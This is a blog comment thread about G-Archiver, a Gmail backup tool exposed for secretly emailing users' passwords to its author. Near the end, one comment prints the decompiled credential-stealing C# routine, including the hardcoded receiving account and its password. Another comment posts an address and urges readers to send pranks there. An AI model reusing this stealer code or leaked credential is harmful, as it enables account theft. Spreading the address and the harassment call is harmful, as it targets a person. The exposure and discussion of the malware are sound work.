I was thinking that too.

I hate to add to this long list of comments, but I can't help but notice this:
client.EnableSsl = true;
Irony anyone?

"The fact is that if we considered those around us who we don't know as equal in worth to ourselves we would think twice be-fore working on weapons and devices that we know will kill others."

If we consider those around us "equal in worth", where worth is the capacity to create, to dream, to love, etc, we also have to consider them equal to us in their capacity to invent ways to kill us. To the extent that a human is capable of good, he or she is also be capable of evil.

"However, as a computer scientist, I stand firmly opposed to copyright and patent monopolies."

I completely agree with your principles, but any serious set of ethics has to render unto Caesar what is Caesar's.

@A Programmer

The perpetual nature of US copyrights (70 years after the death of the creator plus however many years Disney wants added so they can keep Mickey Mouse out of the public domain) is the major problem with copyright law. I have no problem with using copyright to protect software; it worked for many years, it prevents wholesale theft while allowing independent invention.

Patent law is a whole different animal. Traditionally patents were awarded only for physical devices - software was only considered if it was part of a physical device. Now any jackass can patent math and dance (software and "business processes" such as Washington Mutual's branch office layout.)

I don't see any problem with ACM's approach regardless of my view that software patents are an egregious misuse of the patent system. Like it or not, it's the law and the right way to handle the issue is to tell the profession to obey the law as part of a code of ethics while working to get bad law changed. ACM does the former; does it do the latter? Given its membership and (more importantly) sponsorship, can it?

Contrast ACM's code of ethics with those of LOPSA (The League of Professional System Administrators - see http://lopsa.org/CodeOfEthics):

"I will educate myself and others on relevant laws, regulations and policies regarding the performance of my duties."

and

"As an informed professional, I will encourage the writing and adoption of relevant policies and laws consistent with [the LOPSA Code of Ethics]."

That said, I've decompiled Java to examine vendor source code to debug problems and nudge vendors toward fixing our issues. I've done code reviews on proprietary code to which I have had access to the source and have reported bugs back to the vendor (specifically for software that estimated the effects of radioactive material releases to the public.) In that case, the vendor issued an advisory and sent us a fix within a few days.

Experience has convinced me that whether software is proprietary or open, the end user must have access to the source code otherwise they have no assurance that the code even works or that the vendor's agenda aligns with their own. Code is the instantiation of the author's agenda - if the author is a grifter or thief, it will show in the code.

@ Justin Megawarne

Being entitled to viewing the source code doesn't help at all. There's no way to actually verify that the site in question actually uses the source code as-is. That's a huge misconception that people have about open source software, especially open source-based online apps.

People assume, "well, look, the source code is available, everything must be on the up & up." For all they know, the site is 100% malicious but using the same interface. Really, the only way to be safe with open source is to diligently read the code and then compile it yourself, or to trust the community distributing it. Of course, that's not an option when you're on someone else's site.

OAuth, OpenID, etc. are vitally important options. Of course, they're still not ultimately friendly enough. And in the case of OpenID, there's still a huge level of trust that has to be placed on the provider (since Joe Shmoe will not have his own web site).

It's already bad enough that email is the focal point of almost all of a person's services/usernames/passwords... and losing access to your email effectively terminates your online self. Sure, Google can be trusted with email, to a degree. That's not necessarily the issue. The issue is just how *EASY* it is for someone to get your email user/pass. Use any machine that has a keylogger (hardware or software) installed by a user or virus, and boom... everything you've ever done and use is in someone else's hands.

I suppose the only way to combat that is biometrics + some form of verification that relies on a floating, constantly changing password some how. :S

@ Justin Megawarne

Oh, sorry, I re-read what you said. You meant a piece of software like G-Archiver. Of course, what you suggest wouldn't be fair or legally possible.

How 'bout this for an idea along those lines: a third-party that verifies software as "safe". It would be the BBB/Verisign of sorts for software. I suppose, the company or independent developer would then pay the verification service based on the complexity/length of the code. The service would verify various points, ensuring the software won't screw a user, then give a quality seal w/ lookup online, as well as the hash or whatever to verify it's the same software.

That would allow developers to keep their intellectual property and get their software used more. And that'd be great for users as well. Oh, and great for a business if the costs can be worked out.

I don't know, maybe things like that exist (probably).

There is no John Terry,from the password you can guess its some Asian dude wanna be hacker,and the site you mentioned to download is a bad site to download things from.Try download.com next time.

NOTE: Its not about programming ethics or programmers. There are good and bad people.And well it everyone had ethics (ba humbug!) then the world would have been a better place and no one would create viruses,hack tool,root kits(sony!) etc....

Lame post i tell ya.

PS: Hope you dont censor this !(free right to opnion)

@Justin Megawarne

"This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash."

This is one reason that the police should be entitled to examine a citizen's emails and personal correspondance, without fear of legal backlash.

"There is an ethical imperative here that overrides any economic rebuttal."

There is a public safety imperative that overrides any privacy rebuttal.

I thought your arguments sounded familiar.

Haha, this is probably one of the dumber identity thieves I've heard of. Why embed his own username and password and risk it being extracted when THE USER JUST ENTERED THEIR OWN SET? He could've just use theirs and sent an e-mail using those credentials! The only problem then is that an e-mail might appear in their sent folder (until he immediately deletes it).

Of course that wouldn't have prevented its detection. Assuming this is a .NET program (that's the only Reflector I know) there is no way to prevent deompiling unless you use one of those expensive scrambling/obfuscating programs (there might be a free/open source one as well, wouldn't surprise me, but I don't know of any ATM).

(ironic mode:on)
I need my ex-girlfriend gmail password, it's very important! please send me it at my hotmail account.
Thanks
(ironic mode:off)

;-)

As was already mentioned, you can easily backup your gmail with, say, thunderbird, in 5 easy steps:

http://blogoscoped.com/forum/22775-full.html#id24184

This is truly a sad story =( Us geeks are often privy to a LOT of very confidential, sensitive information, be it logins, financial data or even business plans. There is implicit trust as soon as people fire up your application, that trust should never be abused. Its unethical, immoral and excuse the language, but just makes you an a-hole!

Well done though Dustin for figuring it out and doing the right thing! Did anyone ever find out if he emailed the people that had been stung to get them to change their account information?

Hell of a good reason to fire up reflector on any shareware that you enter account information into..

Good job the idiot didnt have the brains to store his password in some soft of encrypted format! =D

I must say, I love the comments about how if this were open source, this could never have happened.

Consider this:
1) I make some application
2) I package up the source code
3) I inject malicious code and compile said source code
4) I put both the 'clean' source and malicious binary files on (say) Sourceforge and mark it as GPL.

How many people, do you think, are going to actually check that the source and binaries match, or compile it themselves from source?

Open Source Software is not the answer to preventing this kind of abuse in trust.

As for the comments that this was possibly just debugging information let loose - take another look at the source code. It's pretty obvious that this is NOT just debugging info.

It's also unfortunate that Dustin probably broke several laws doing the right thing to protect these folks who had been exploited.

The worst thing is that now our dear Jeff (probably) won’t stop cheating but will become smarter covering his @ss while doing it.

We all applaud DB for doing what, in the end, is right.

However his actions weren't (entirely) ethical. After DB logged onto gmail and verified that the code was stealing username/passwords he should have stopped. It can be argued that up to that point he couldn't know his assumptions were correct. There's often dead code, and the code discovered code doing the emailing could have been 'test' code for all DB knew.

Additionally, using Lutz's Reflector isn't illegal. JT made no attempt at obfuscating his code, encrypting, signing, etc. No more illegal than using a screwdriver to open a tv set. Why do coders/politicians/police think that some legally magical properties are given to some binary output after being processed by a compiler.

However much I'm in favor for DB's actions, once he deleted the emails he's trashing evidence and exposing himself to prosecution/liability (in some countries at least). We cringe when an honest guy gets trashed because he was trying to do good.

If DB just changed the password that would have been OK, because all that does is prevent the malicious software from operating, and doesn't cause any long-lasting damage.

That said, I really doubt that DB thought out his actions once logging onto gmail. He reacted, probably like many of us would. I imagine being in that situation, freaking out, and doing the exact same thing as a knee-jerk reaction.

So save your harsh comments for JT instead, because he deserves them, as well as deserving prosecution.

I'm lost trying to figure out the point of this article. Other than mentioning something vaguely smart and hand-wavily academic (like the ACM code of conduct), I don't spend my time reading Coding Horror to hear about simplistic disassembly of crude pieces of spyware; there are much better resources for that.

Deleting the email data in question was a really dumb knee-jerk reaction, although I trust that Google are well equipped to deal with this kind of stupidity.

For those just tuning in to this thing called the Internet, creating quasi-useful pieces of software that act as a conduit for malware is nothing new. Think FunWebProducts, think of the potentially hundreds of game cheat tools, aimbots, and what have you that have been using this trick for well over a century.

Given that GMail provide POP3 and IMAP access, I cannot understand why even a rookie technophile would go off in search of a specialist tool for archiving mail. For what it's worth, I use the excellent little mpop utility for backing up my GMail, although offlineimap works too.

AFAIK, the information in the gmail account is not actually deleted, in the sense that Google could still recover it if they wanted to, although that would probably require a court order. It might be worth seeing if law enforcement wants to take an interest in this guy - it's not too late.

>Think FunWebProducts, think of the potentially hundreds of game cheat tools, aimbots, and what have you that have been using this trick for well over a century.

since 1908?

@David Wilson,

How on earth can you compare FunWebProducts (which bundled basic, bur irritating, adware - stupid pop up windows and toolbars) with a program coded to steal usernames and passwords?

If you stopped programming on everything that could possibly hurt an innocent person then you wouldn't be programming at all.

Matt on March 8, 2008 08:45 AM

Wow, that has to be the stupidest comment ever.

Every snowflake of an avalanche proclaims its innocence... >.>

@Geri:

You can't port someone's opinion over from one thing to another. If I'm running software on my computer, I have a right to know what it does. The police only have a right to spy on people when they have reasonable grounds to believe it is necessary -- there's almost nobody who thinks that police should NEVER be allowed to read private mail; the only real argument is WHEN "there is a public safety imperative that overrides any privacy rebuttal."

Your argument it facile.

Agree with A. Programmer above; copyrights and patent are not property rights, and there is no such thing as "intellectual propertY".

It might have been more wise to datamine the usernames from his inbox, and do a mass-mailing to all of them telling them to change their password. You definitely did a good thing, though. Hopefully Google can take care of informing the users to change their passwords.

Why do you need junk software like this when you can simply use **any** email client, via POP and backup your mail locally? It's not like yahoo or hotmail where you have to pay for POP access. Duh?!?

This would never happen in the Linux world because the approvers of binary packages we download from our distribution vendor must first have access to the source code, and they review the source for malicious items like this. And on Ubuntu, this is doubly so because packages are reviewed by the Debian team, then by the Ubuntu team.

So, Windows users, you might want to start getting the source and compiling stuff yourself rather than using binary executables.

Before we point fingers of Linux vs. Windows and claim how you should have done this or that, we need to take a bit of action:

1). Everyone here should email abuse@godaddy.com and tell them that a site they've registered is doing something that is probably illegal. The site is registered by GoDaddy under the name of MateMedia:

Administrative Contact:
Inc., MateMedia hostmaster@matemediainc.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
(877) 309-7521

Next, if anyone of you know someone who has fallen for this, have them write a complaint to the Attorney General of Florida: http://myfloridalegal.com/contact. There is a complaint form: FILL THAT OUT! Don't just email the Attorney General, fill out the form at http://www.myfloridalegal.com/ConsumerComplaint.pdf.

They will track down this guy (easy enough to do with a few court orders) and go after him. He has committed fraud (especially since he's taken money for this program), electronic theft, and possible identity theft.

BTW, you might find this article of interest: http://www.quickregister.net/articles/customerservice/4_Customer_Service_Mistakes_Companies_Should_Avoid.html. Apparently, his name here is "Russ Mate".

Here's a few more URLS http://www.russmate.com/
http://mediamateinc,com

Might I suggest that you change the title of this post to something like "Don't use G-Archiver" so that it shows up as an immediate clear warning in search results. It already shows up as #3 in search results for g-archiver, but g-archiver itself is #1.

I am in no way defending what happened here, but in all honestly blaming shareware is not really fair. If anyone had gone to the "companies" site and taken a loot at it, they probably never would have installed it being how shady it looks. That's just common sense, I am sorry.

There are legitimate companies out there that get listed on shareware sites, be it from themselves or from affiliates.

Shocking indeed, is there a way to announce and create awareness so in future other innocent users don't fall into this trap ?

A few comments on Dustin Brooks' ethics:

Dustin Brooks did no wrong in using Reflector. There is nothing in the G-Archiver license that prohibits using Reflector in examining the source code.

Dustin Brooks took immediate action when he suspected that his Gmail address was stolen. Normally, you don't log onto someone else's account, but in this case, Dustin Brooks had immediate knowledge that his Gmail account information was stolen, and had to take immediate action to prevent theft.

Dustin Brooks saved thousands of people from getting their email addresses stolen by deleting them from this account. He has saved thousands more from getting their email stolen by deleting the account and locking it.

Saying Dustin Brooks acted unethically is like saying someone who runs into a burning building and saved a baby acted unethically because they didn't ring the doorbell and asked permission to enter and thus trespassed onto someone else's property.

The account in question was obviously used to steal email addresses from other people. Dustin Brooks quick thinking saved them from having their accounts stolen.

There are two other things Dustin Brooks should do: If possible, contact these people and let them know their Gmail accounts might have been compromised. He should also contact Google and let them know about this account and contact the Attorney General's office to file a complaint.

As for Russ Mate who is shocked! shocked! that this happened on one of his accounts, why is the garchiver site still up and running? Certainly, you as the technical contact and registrar have the power to take this site off the air. If someone contacts you about g-archiver, are you willing to reveal the name of the client, so others can get in contact with them, or to be able to file charges against this client?

Why did you link to the software as well? Gives it promotion.

BTW, I have a small and OPENSOURCE Python script to backup your whole GMail account (inbox, archives, sent) in the standard mbox format.

You can review the sourcecode yourself: There are only 23 lines of code.

http://sebsauvage.net/python/snyppets/index.html#archive_gmail

I would like to pose a hypothetical situation for people to consider.

If some sort of potentially IMMEDIATE risk were occurring, like, say... I left my keys in a bus station, and a friend of mine saw someone that neither one of us knew, entering my house... there are some things I would like him to do.

1) Phone me - Dustin SHOULD have emailed everyone on the list, I agree... however, all of this information seems to be included in R/E line.. or the body...? In any event, it does not look like it would be as easy as clicking "forward", or anything else like that, it looks like 1700+ emails worth of cutting and pasting.

if the hypothetical friend of mine (i have no actual friends) who saw the intruder didn't have a cel phone, was out of time or dropped it and broke it, that's ok... I WOULD APPRECIATE SOMEONE ACTING IN MY BEST INTEREST. I would hope my friend would carry on to ...

2) Approach my house and ask what is going on - Dustin looked through the emails, and came to a conclusion which, I think we can all agree, was a no-brainer. The few reasons for having a list of this information are few, and none of them are in the best interest of the person doing it.

The chances that this list were an innocent list of names, for say demographics, are stupidly slim.

If my friend saw this person, say, stealing my stuff through the window... I would hope that they would take some action!

Incidentally, if Dustin approached the house and annouced himself to ask what was going on, he may put himself in danger - or the intruder may run off with my keys. So, maybe the metaphor isn't PERFECT, but it's 5:45 am.

3) Inform the Authorities - Dustin informed Google. Nuff said. My friend should call the police, number one. However, that (in my mind) does NOT preclude ...

4) Act to save my stuff - Go in and knock the guy out! I certainly won't charge my friend with trespassing, and I don't think the cops in MY home town would charge him with assault. This would probably end up being one of those "He must've fallen while trying to escape and given himself 4 black eyes" cases.

Maybe the metaphor is wrong in several ways, since it doesn't really convey the immediacy of the threat... what if my friend saw this intruder, lighting a match and setting it to my sofa? What if the problem were so immediate, that every passing second could spell disaster?

To anyone who knows me;

If I see someone about to burn your house down, and the battery on my cel phone is dead, I will
a) Enter your home
b) grab a fire extinguisher
c) douse him with it
d) knock him upside the head with it until he stops moving
e) use your phone to call the cops

I would do so in the full knowledge that you could, for example, charge me with breaking and entering, or he could charge me with assault. Hopefully, he didn't die from the battery.

Oh, and by the way, Dustin... THANK YOU! Don't pay any attention to people who BS about legal crap. You did, IMHO, the right thing. Yeah, you didn't email the people, but in the heat of the moment... sometimes we forget to plug in our cel phones. Everyone on that list is grateful to you, I am sure. I sincerely hope you interrupted a bot and crashed a server when you did it.

"and none of them are in the best interest of the person doing it."
=
"and none of them are in the best interest of the people who's information is so stored".

I think the point here is not about ethincs as you can never rely on someone else to have ethics... It's more about protecting your information.

Passing your username and password to anyone for anything should always be done extremely carefully.

On a similar theme, one of my pet hates is websites that require you to register on them. You create a username and password, they then immediately email you your credentials (so you don't forget them?).

I then kick myself for having used one of my current "strong" passwords for them to then send in an email in plain text! Where's the ethics in that?

from bothersoft site:
BrotherSoft.com is not only a website for software downloading, we also evaluate the software based on our established evaluation criteria, which is submitted by developer. And we will also give the software developer an honest opinion. Our original intention is that our evaluation could help the software developer provide a better one for their customers.
(auhuahuahuahuhauahuhauhauhau)

Actually John Terry is a quite famous guy.
http://www.chelseafc.com/page/ThePlayers/0,,10268~5593,00.html

Name is most probably just bogus - especially if this was intent.

I never found a decent email archive program so I wrote one in Python about a year ago, it downloads your emails to text files (saves the extensions too). I figure there might be some people looking for a decent, simple email archiver so I threw it online. You can find it here...

http://lab.noopsi.com/popbak/

Jeff, I hope it is okay to post a link like this. I polished the script over the weekend because after reading this post on Friday I figured there might be some people looking for a new email backup utility. Also, since it is written in Python there aren't any secret surprises since you can see everything Popbak does.

It looks like from his password "bilal482" which is an asian name, his name might not be John Terry at all.

Umm...let me get this straight -

You want to back up your email, which contains a bunch of sensitive data. Rather than back it up securely on your own machine or device (which can be done in, probably, thousands of different ways), you decide to download some random application that was written by someone you don't know, and then blissfully punch your username and password into it.

Can we please stop talking about heroes and villains and start talking about stupidity?

@David W: The garchiver site is still "up", but the "Free Download" and "Buy now" links have been removed. I guess that's better than nothing, under the circumstances.

- Roddy

I don't know about in the USA but in the UK this would actually be illegal as it would fall under our data protection act. Basically no one can store your information without letting you know first then they must remove it after it has become unreasonable to keep (likely out of date, not needed etc..). It is also their responsibility to hold it securely.

public class Mail
{
// Methods
public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}
}

Granted my actions may have been a little quick and harsh, I was a little upset over the whole deal. I have a lot of personal info in my account along with a stored credit card for google checkout.
I very easily just could have changed my password and been done with it, but I didn't want more people compromising their accounts as well.
The only emails in this account were usernames/passwords. This wasn't a personal account used for other things.
The only thing I worry about now is his account getting restored from Gmail. Does anyone have a good way to contact them? I sent something through their "suggestions form," because it was the only one I could find.

I don't think you were too quick or too harsh Dustin. I think you did exactly the right thing and as others have said I would have conntacted GMail and the FBI (since it's interstate fraud).

I don't think a wholesale abandoning of shareware is the answer. Nor is open source. While this may seem like a smoking gun for the case of open source let's not be so reactionary. There are many, many honest software developers that release their software as shareware to get their product on people's desktops.

You wouldn't say, "I stubbed my toe on the kitchen table so we must outlaw all tables... and toes."

I haven't ready all the posts, but I'll try to answer a few more questions.
Yes, I did kind of screw up by downloading some random software and I'll take the idiot card for that. I was essentially looking for something that would backup the gmail emails in their entirety. I use the labels almost religiously on everything in my box and wanted a way to keep those intact (which by the way Thunderbird will kind of do using IMAP, so yay).
Since this program wasn't going to cut it, I wanted to see how much code went into getting it this far in case I was going to be forced to try and write something myself. I've used Reflector on a lot of things, that doesn't mean I've stolen other peoples code, claimed it as my own, sold it on the black market and killed puppies as some people seem to think.
Oh, and a lot of the emails had been opened. And there is absolutely no reason to have a debug function to email the username and password of a gmail account, to another gmail account.
And to email all the affected accounts would mean getting each name individually off the body of the message. They were sent from jterry to jterry, so they weren't added to his contacts.

You should submit that to thedailywtf.com

You know, skimming the comments after getting here from Daring Fireball, I'm surprised nobody brought up this classic...

http://cm.bell-labs.com/who/ken/trust.html

Hey, how about blurring/mosaicing out the 10 or so gmail names that are in that screenshot?

Too late. They'll now get even more spam.

@Dustin:

In case you decide to delete John Terry's google account,
http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=32046

Ryan,

Well, the jury's still out on whether you're an idiot, so no worries. :-D

Technically, there should be no need for JTerry to have included his own login credentials in his code. I absolutely guarantee that GMail does not require any authentication for inbound emails. It is completely trivial to send a message via SMTP (the protocol is completely text based and can be used via a telnet program). MIME headers and formatting are not required.

Excellent work man, its good to have people like you around.

erm... are you familiar with the concept of "POP mail". when you can pop your gmail down for free.. why were you looking for an alternative to backup your emails???

Oh, very unpleasant.

It looks like G-archiver has been taken down from all of the shareware download sites, as well as the G-archiver website itself. Does anyone still have a link to the original executable? I would love to peruse the decompiled source code for myself.

I agree with Domenic. DPAPI does not solve all problems. Is there a way the writer of this program could have used DPAPI? Wouldn't the installer at least need the password in plain text so that DPAPI could encrypt it specifically for the machine the software was installed on?

Open source ftw?

This is kinda of a catch 22, why would Dustin log into John's account without breaking some sort of ethics? If I was Dustin I would had done the same thing. But imagine if he logged into his email account and there was nothing?

-- We use Lutz as a verb. "Let's lutz it and find out"

I'm having that one David. Duly adopted.

I'm very skeptical of any third-party site or application that asks for username and password. These days access to your e-mail account gives a person access to your entire life.

Moral of the story: Trust No One.

> What about working for a company like Raytheon, whose job is to
> build better killing machines? Would you consider that ethically
> defensible? That would seem to violate principles 1 and 2. Or, what
> about working for an online gambling site? I'm just curious as to
> where you would draw the line.

I think that at some point it has to come down to your own moral compass. I've worked in and around the defense industry my whole carreer. The thing is, the industry is about a whole lot more than just killing. For instance, I've done projects for NASA, which is about the most noble work I think a software engineer can be involved in. I've worked on flight simulators which keep pilots from *dying* from their mistakes while they are learning to fly. I've worked on shipboard engine controllers, which are what helps keep our sailors alive when the chips are down.

On the other hand, I have had two situations where I had to put my foot down. The first was a tank simulator for the Chineese army about 5 years after Tienamen. (Two ways I'm doing that: no way, and no f'n way!)

The second was a job offer I got for building smartbombs.

Not that I'm being judgemental here. I'm sure there are some people who could sit in a chair at the retirement home at the end of their carreer and be proud of a life spent building bombs. After all, a properly coded one probably causes less collateral damage and deaths than conventional bombs to produce the same effect. However, I am not one of those people.

Here is where this douce bag lives:

10431 SW 88TH STREET SUITE D309, MIAMI FL 33176

Everyone send pizza and plumbers there.

I think people are confusing that this is all work of Jeff because of few reasons:

1. The way Jeff puts ligh colored block and alignment in para-phrased is sometimes hard to notice. It is done nicely, but too nicely to differentiate.

2. Language Jeff used is burined between two para-phrases.

Personally I have found such entires quite confusing but appreciate that since I don't read all feeds, Jeff's is kind of digg to me, which helps me get such interesting content.

Ketan

I blogged about this kind of behavior once before, but the *message* got lost. This is *exactly* the sort of thing I was talking about:

http://eddiesguy.blogspot.com/2007/08/heroes-villains-and-software.html

I tend to agree with what Dave said, was Jeff's action not taking the law into his own hands?

However on the other hand, Well done Jeff and writing this post. This type of programmer behaviou is criminal and leads to a total invasion of ones privicy.

As much as there are ethics and hopefull the majority of profesionals follow them, there is always the criminal mind. I am of the opinion that the industry should be more regulated and programmers held accountable for malicious code. I know this is an impossible ask, but would it not be nice?

Kudos!

Count me in the "mostly did the right thing" camp:

- Reflector: does anyone who doesn't wear a suit really think "reading the directions" is a crime? (This doesn't pardon plagerism or other unsavory *use* of what you see, but the act of looking?). No harm was done here.

- Google: I probably wouldn't have deleted the emails (given a few minutes to think about it). Best practice probably is:
1. Check for email forward.
2. Add email forward to auto-reply warning that their information is being compromised. Cc abuse@google.com (or some other suitable email)
3. If there's an easy way to auto-reply to existing victims, do the same for them.
4. Change the passwords, security keys, and whatever else I can find.
5. Send an email to abuse@google.com (or whatever email I find) *from that account* detailing the situation and actions taken.
6. Log out, and find a better way to backup email. :)

Everyone who can be informed is informed, perp is locked out - but if it turns out to be some massive misunderstanding *snicker* nothing irreversible has been done, and I am relatively anonymous (if someone decides to go all Gestapo on "the big bad hacker") Not bothering to contact police - Google'll do it if there's a chance of prosecution.

Suggestions?

It looks like it really could have been a mistake:
http://www.garchiver.com/what-happened.htm

Since the method is called "TestConnection" this is even somewhat plausible. Seriously, I bet there are programmers here who have leaked their own credentials this way.

Its still pretty stupid, though... ugh.

no

"What happened was that a member of our development team had inserted coding used for testing G-Archiver in the debug version and forgot to delete it in the final release version."

Riiiiight...

Somehow I doubt that it takes a "development team" to write this piece of blatant malware.